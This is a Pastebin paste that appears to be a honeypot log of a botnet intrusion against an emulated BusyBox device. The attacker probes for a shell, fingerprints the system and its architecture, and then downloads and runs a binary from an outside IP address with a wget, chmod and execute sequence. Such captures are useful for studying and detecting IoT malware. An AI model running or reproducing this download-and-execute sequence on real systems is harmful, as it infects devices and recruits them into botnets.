Advertisement
Guest User

Untitled

a guest
Aug 24th, 2019
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.96 KB | None | 0 0
  1. # enable
  2. enable: command not found
  3. # system
  4. system: command not found
  5. # shell
  6. shell: command not found
  7. # sh
  8. Busybox built-in shell (ash)
  9. # cat /proc/mounts; /bin/busybox SPWFT
  10. /dev/root /rom squashfs ro,relatime 0 0
  11. proc /proc proc rw,nosuid,nodev,noexec,noatime 0 0
  12. sysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0
  13. tmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0
  14. /dev/mtdblock10 /overlay jffs2 rw,noatime 0 0
  15. overlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0
  16. tmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0
  17. devpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0
  18. debugfs /sys/kernel/debug debugfs rw,noatime 0 0
  19. SPWFT: applet not found
  20. # cd /tmp; cat .s || cp /bin/echo .s; /bin/busybox SPWFT
  21. cat: .s: No such file or directory
  22. SPWFT: applet not found
  23. # tftp; wget; /bin/busybox SPWFT
  24. tftp: command not found
  25. BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary.
  26.  
  27. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
  28. [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
  29. [-U|--user-agent AGENT] URL...
  30.  
  31. Retrieve files via HTTP or FTP
  32.  
  33. -s Spider mode - only check file existence
  34. -c Continue retrieval of aborted transfer
  35. -q Quiet
  36. -P DIR Save to DIR (default .)
  37. -O FILE Save to FILE ('-' for stdout)
  38. -U STR Use STR for User-Agent header
  39. -Y Use proxy ('on' or 'off')
  40.  
  41. SPWFT: applet not found
  42. # dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
  43. ELF(h4X^4 (0+0 records in
  44. 0+0 records out
  45. 0 bytes copied, 0 s, 0,0 kB/s
  46. do: command not found
  47. done: command not found
  48. # /bin/busybox SPWFT
  49. SPWFT: applet not found
  50. # rm .s; wget http://177.68.189.3:37014/.i; chmod 777 .i; ./.i; exit
  51. --2019-08-24 14:07:53-- http://177.68.189.3:37014/.i
  52. Resolving 177.68.189.3 (177.68.189.3)... 127.0.0.1
  53. Connecting to 177.68.189.3 (177.68.189.3)|127.0.0.1|:37014...exit: command not found
  54. # q
  55. q: command not found
  56. #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement